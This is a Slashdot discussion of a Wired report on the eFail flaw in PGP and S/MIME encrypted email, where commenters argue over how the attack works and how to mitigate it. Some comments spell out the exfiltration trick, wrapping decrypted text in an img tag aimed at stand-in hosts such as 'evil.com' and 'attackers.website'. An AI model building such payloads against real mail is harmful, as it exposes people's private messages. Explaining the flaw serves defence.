Encrypted Email Has a Major, Divisive Flaw (wired.com) 116
An anonymous reader quotes a report from Wired: The ubiquitous email encryption schemes PGP and S/MIME are vulnerable to attack, according to a group of German and Belgian researchers who posted their findings on Monday. The weakness could allow a hacker to expose plaintext versions of encrypted messages -- a nightmare scenario for users who rely on encrypted email to protect their privacy, security, and safety. The weakness, dubbed eFail, emerges when an attacker who has already managed to intercept your encrypted emails manipulates how the message will process its HTML elements, like images and multimedia styling. When the recipient gets the altered message and their email client -- like Outlook or Apple Mail -- decrypts it, the email program will also load the external multimedia components through the maliciously altered channel, allowing the attacker to grab the plaintext of the message.
The eFail attack requires hackers to have a high level of access in the first place that, in itself, is difficult to achieve. They need to already be able to intercept encrypted messages, before they begin waylaying messages to alter them. PGP is a classic end-to-end encryption scheme that has been a go-to for secure consumer email since the late 1990s because of the free, open-source standard known as OpenPGP. But the whole point of doing the extra work to keep data encrypted from the time it leaves the sender to the time it displays for the receiver is to reduce the risk of access attacks -- even if someone can tap into your encrypted messages, the data will still be unreadable. eFail is an example of these secondary protections failing.
The eFail attack requires hackers to have a high level of access in the first place that, in itself, is difficult to achieve. They need to already be able to intercept encrypted messages, before they begin waylaying messages to alter them. PGP is a classic end-to-end encryption scheme that has been a go-to for secure consumer email since the late 1990s because of the free, open-source standard known as OpenPGP. But the whole point of doing the extra work to keep data encrypted from the time it leaves the sender to the time it displays for the receiver is to reduce the risk of access attacks -- even if someone can tap into your encrypted messages, the data will still be unreadable. eFail is an example of these secondary protections failing.
Slashdot has a major, repetitive flaw (Score:4, Informative)
(see title)
Re: (Score:1)
Here's an article about Slashdot's repetitive flaws...
https://it.slashdot.org/story/18/05/14/149222/attention-pgp-users-new-vulnerabilities-require-you-to-take-action-now [slashdot.org]
A silver lining? (Score:1, Interesting)
Re:A silver lining? (Score:4, Insightful)
No need. The morons making "modern" mailers just need to learn about the basics of security.
Broken mailers (Score:4, Insightful)
Any email program which respects html instructions to automatically load external content was badly broken from a security perspective even before you consider the errors the researchers here exposed.
Any email program which directly fixes the hack without barring external content from loading when the email opens remains badly insecure.
Re: (Score:1)
Okay but what if it has to execute javascript which was embedded in the email message. A lot of html pages won't render without js tweaking them these days. And the JS is going to grab the plaintext and phone home.
Personally I would paste the ascii armoured encrypted text into an external PGP application to decrypt.
Re:Broken mailers (Score:5, Informative)
But it doesn't have to do that.
In fact, if it does do that, it's broken.
Sending me executable code I didn't request is an attack. My e-mail client should never execute code from a message. Never. Not under any circumstances.
Encrypted email + html = fail (Score:2, Informative)
If youâ(TM)re serious about your email security the first thing you would do is disable HTML email in your client. This is an attack thatâ(TM)s easily mitigated by observing the bare minimum of best practices.
Re: (Score:1)
I don't send HTML emails. Am I safe?
No. The attacker can change encrypted text/only emails to HTML emails. You need to disable viewing HTML email to increase protection from EFAIL attacks.
It's easy to protect the encrypted part from this. Add <![CDATA[ to the start and ]]> to the end, and even if someone has HTML and external content fetching switched on, the attackers get nothing.
Re: (Score:2)
CDATA is trivially broken out of.
Re: (Score:1)
Re: (Score:2)
Re: (Score:3)
Re:I don't get the issue with PGP? (Score:5, Informative)
It is not a flaw in PGP/GnuPG. It is a flaw in the email software, or rather several flaws in combination. The combination seems to be widespread unfortunately.
Re: (Score:2)
Wait a minute. My understanding is that the attacker changed the ciphertext and got predictable plaintext to come out. I didn't expect that.
Fuck HTML email, but it sounds like we still have a problem.
Re: (Score:3)
Wait a minute. My understanding is that the attacker changed the ciphertext and got predictable plaintext to come out.
That would actually not be a problem. In Plublic-Key Crypto, the attacker can always do that, because anybody can encrypt messages for a recipient.
The problem is a combination of broken MIME decoding in combination with ignoring an error message from PGP/GnuPG and a really stupid decision to load external content when an email is displayed.
Re: (Score:2)
Ok, let's ignore that for right now, and just hypothesize that HTML email doesn't exist. Let's not try to protect against someone who is doing something silly anyway. No external content. I think we still have a problem even in that scenario.
Re: (Score:2)
No problem in that case. This exploit depends on wrongly embedding the encrypted part of the email into html after decryption and then doing an external fetch of an image using it. Basically (simplified a lot), if your mailer transforms <img src="http://evil.com/[encrypted]"> to <img src="http://evil.com/my_secret_message">, then "my_secret_message" gets sent to evil.com as part of the query. The attacker would before that inject the http part into the non-encrypted part of the message.
For this
Re:I don't get the issue with PGP? (Score:5, Informative)
PGP has message integrity checks.
When operating on files, PGP simply refuses to decrypt malformed (tampered) messages.
However, when invoked to process as a pipe, it will spit out the plaintext, then a warning.
Even though the client is at fault for ignoring the warning, arguably, PGP should be consistent and spew out only the warning.
Dupe (Score:1)
Is the flaw that Slashdot editors posted a duped story?
Re: (Score:2)
The stories were encrypted so the editor could't read their contents and tell they were dupes. The stories are proof of concept by themselves and only become readable once published on Slashdot with the help of the MIME hack.
Re: (Score:2)
Should have included HTML so that it could be decrypted surreptiously.
HTML in email (Score:2, Informative)
was always a bad idea.
Re:HTML in email (Score:5, Interesting)
"So we should go back to RTF? Or heaven forbid... back to plain text?"
Yes, or rather, there are some of us never left plain text email, including using fixed width fonts and 80 column lines. If you send me HTML-only email, there's a really good chance I'll never bother to read it. I haven't been informed of a situation where in retrospect I have come to regret this policy.
I'm no Luddite, but not every "advancement" is an improvement.
Re: (Score:3)
Agreed - I have my email reader set to "plaintext only" - and would specifically have to tell it to display HTML
Re: (Score:2)
Re: (Score:2)
Dupe and Wrong (Score:5, Informative)
Old news and it's not PGP and S/MIME, but the mail clients that can use them: Thunderbird and Apple Mail and Outlook. Probably also affects clients using GPG. Or any other encryption scheme.
PGP is not broken. GPG is not broken. S/MIME is not broken. The flaw is in how mail clients display email. Admittedly, a lot of them have the same issue.
Re:Dupe and Wrong (Score:4, Funny)
PGP is not broken. GPG is not broken. S/MIME is not broken. The flaw is in how mail clients display email.
I don't buy it. I mean, if there were just a mail client issue then why am I already flailing my arms and screaming? ;)
Re: (Score:3)
Because you’re name is Chick N. Little?
Re: (Score:1)
Wired misunderstands exploiting the flaw. (Score:4, Insightful)
This sentence stuck out to me:
The eFail attack requires hackers to have a high level of access in the first place that, in itself, is difficult to achieve. They need to already be able to intercept encrypted messages, before they begin waylaying messages to alter them.
My response would be that if you're not worried about someone intercepting your email, then why are you encrypting it in the first place? This is essentially a MiTM attack, which is exactly what encryption is designed to protect against. If it can't protect against it, the encryption has completely failed.
I'd say that's the case here. This isn't one of those silly edge cases certain security people jump up and down over nothing. Like "well first you need root access, and then you can get an even higher level of security access!". This is a real, bona-fide hack. Congrats to the researchers who found something real.
No. Wrong. Try again. (Score:1)
Or you could get a clue.
It is NOT a MITM attack, not even close.
It is a VERY dubious 'attack' that required the email to load other, non secures content via normal http which they then ALSO intercept, inject content that magically takes control of their computer and steals the unencrypted email. You would never several layers of flaw and a high level of network control over the targets computer in the first place.
Basically, if they use a normal browser and you had this level of control then you could own th
Re:No. Wrong. Try again. (Score:4, Informative)
Bad guy intercepts encrypted email he wants to read. (MITM). He injects additional HTML data into the email (in his possession). He sends the email on to the original intended recipient. Recipient opens email. PGP or S/MIME plugin automatically decrypts the message and hands the output back to the email client for display. Mail client interprets the HTML, which happens to send the now-decrypted text to a webserver under the attacker's control.
So, yes, this does act as MITM. It does not require the attacker to have previously compromised the victim's system.
Re: (Score:2, Insightful)
Bad guy intercepts encrypted email he wants to read. (MITM). He injects additional HTML data into the email (in his possession).
Except the email is still encrypted at this point. How could they inject HTML into an encrypted email?
So, yes, this does act as MITM.
Except the scenario you invented is not what this flaw is about and flaw doesn’t allow tampering with the encrypted email while in transit. The email isn’t decrypted until it reaches the email client and the email client has to be one of the buggy ones that don’t actually check the failure return.
Re:No. Wrong. Try again. (Score:5, Informative)
Except the email is still encrypted at this point. How could they inject HTML into an encrypted email?
If you don't know the answer to that, maybe you should actually read the description of the flaw?
There are actually two flaws: one is a buggy mail reader application; it should be straightforward to fix the bug. The other is a problem with the spec for encrypting emails (i.e., S/MIME, or whatever the spec for PGP-encrypted email is called).
The mail reader bug is easier to explain: the encrypted email is not 100% encrypted. The contents are encrypted. But MIME messages contain some unencrypted metadata, such as the headers and boundary markers. So the way you inject HTML into an encrypted email is to add a new MIME text/html part before the encrypted part that contains: <img src="http://attackers.website/, and add a new MIME text/html part after the encrypted part that contains: ">. When the buggy mail reader processes the various MIME parts, it decrypts the encrypted part, resulting in HTML plaintext. Now here's the bug: it then joins all the HTML parts into a single HTML document for display, and that results in <img src="http://attackers.website/decrypted content">. So the mail reader app sends an HTTP request to the attacker's website containing the decrypted message in the URL.
The other flaw has to do with a known plaintext attack; if you want to know how that works, RTFA.
Re: (Score:1)
Don't know why Slashdot is now completely burying anon posts (logged in users only?) but how is this any different from every other information leaking bug? It's evil, always was yet a large part of the population and Governments are willing to let Facebook and Google get away with it.
If you use HTML and have remote images (few clients lump all remote requests into this), you're fucking retarded. I'm tired of telling people, they won't listen. So get hacked, and pay up when you need support.
By the way
Re: (Score:2)
If you don't know the answer to that, maybe you should actually read the description of the flaw?
Tried that. Followed TFA link to TFA, wound up at Wired which promptly put up a sign-up form over the top of the article that could not be dismissed in any way I could find. Other than maybe signing in, which ain't. Thanks /. for Wired clickbait.
Your description explains things. It's a stupid bug -- if the contents of an email are changed, then the decryption should fail, period. Headers yes, they need to be mutable (some of them), but body, no.
What email client author actually thought that someone would
Re: (Score:2, Insightful)
So the fix, as usual, is to disable HTML in your mail client.
And also to persuade every person that *you* send encrypted email to to do the same. Good luck with that.
Re: (Score:1)
You may want to read the efail website with the description of the exploits. It *is* injection. Flaw one inserts HTML *around* the ciphertext. The second makes use of flaws in CBC to inject encrypted HTML into the message. While PGP can detect this, the email clients often ignore the warning and display anyway.
Re: (Score:1)
It doesn't need to be a MITM. It could be someone who has access to old stored mail on your server and gets some old encrypted message, fucks with it and resends it to you. It doesn't even have to be your own mail server, could be the sender's or another recipient's.
Re: (Score:2)
Wired misunderstands exploiting the flaw.
After reading your post, I can only assume this title was being ironic? You seem to understand it even less than Wired.
Solution (Score:2)
Don't use HTML Email and the problem goes away. I find that 99% of the time, there is no need for an HTML part to Email, anyway. This whole vulnerability is due to HTML parts being displayed AUTOMATICALLY and WITH loading external parts/links. (If you want to show something external, then just send a link, I don't need a web site "Emailed" to me).
Or, use a "real" Email client (like Claws and perhaps others) that allows you to control how Email is displayed. For example, Claws will happily-
1) Not display
Re: (Score:2)
>"Oh my good lord, I remember the last time I tried to use Claws. I spent probably two or three days tweaking it to not be terrible."
Hmm, I find Claws to be wonderful. It is fast, easy to use, portable, reliable, extremely configurable, and very flexible. There are a few odd things about it, but of all Email systems and clients I have used, I like it the most.
Re: (Score:2)
And if you insist on using HTML email, turn off remote content loading. I know Apple Mail can do this; I recall Thunderbird doing it; and I’m pretty sure most others can as well.
It doesn’t really interfere with much of anything. You are presented with a button which allows you to load the remote content, if you so choose - the mail client just doesn’t do it by default.
Re: (Score:2)
But if I disable HTML email, how will I send every message in blinking, 24-point Comic Sans?
Shoulder (Score:2)
Or they could just read it over your shoulder. Eitehr way.
Re: (Score:2)
They don't manipulate the encrypted message itself. They manipulate the unencrypted message containing the encrypted message, adding blocks of HTML before and after it that make the encrypted message appear to be part of a URL referring to an external resource like an image. It relies on eg. the practice of many email clients of stitching together multiple HTML sections in a multi-part message into a single HTML part and rendering that instead of the original multiple parts.
The vulnerability can be mitigate
Re: (Score:2)
Yes. That should though be handled by the message signature, not the encryption. If you care about the integrity of the encrypted message you should sign it (S/MIME or PGP) as well as encrypting it. The client may ignore the MDCs in the encryption, but a failed S/MIME or PGP signature on the same message will show as an error independent of that.
Lots of preconditions for this attack (Score:2)
- Someone who uses encrypted email but doesn't disable automatic image loading in the client
- Client that can't handle malformed HTML inputs and processes unterminated src tags in a weird way
- Message tampering warnings by the PGP or GPG library are ignored
- Server address where the plaintext will get uploaded thru uuencoded resource requests
I wonder if there are clients that, when user has disabled image loading,
Re: (Score:2)
- Someone who uses encrypted email but doesn't disable automatic image loading in the client
For every one person who cares there's probably five that got badgered into setting it up because the first guy insisted but are otherwise casual users leaving everything at their defaults.
- Client that can't handle malformed HTML inputs and processes unterminated src tags in a weird way
- Message tampering warnings by the PGP or GPG library are ignored
Which seem to be pretty common...
- Server address where the plaintext will get uploaded thru uuencoded resource requests
Oh please it'll be a random botnet IP, you don't need DNS or access to a privileged port or anything just any dumb port who'll forward it to a C&C server on TOR or something like that.
Okay so it doesn't affect the security-minded that read all his mail in plain text and has disabled ex
Divisive? (Score:3)
Divisive?
And just how is this security flaw tending to cause disagreement or hostility between people?
Re: (Score:2)
Divisive?
And just how is this security flaw tending to cause disagreement or hostility between people?
Have you ever read Slashdot comments before?
just use gmail... (Score:2)
S/MIME was made in a world where mail was passed, un-encrypted on SMTP port along a chain of mail servers for every company on the internet. anybody operating any router between A and B, and
please explain (Score:1)
Who sends encrypted HTML messages? (Score:2)
Anyone who is sending encrypted mail is going to be using plain text, right?
Panic! (Score:1)
This seems to be an instance of security researchers crying wolf when they found a scrawny coyote. Doesn't mean the thing wonâ(TM)t bite you, though.
(BTW, slashdot, why did you convert my dumb apostrophes to weird things?)
PGP? (Score:1)
Re: (Score:2)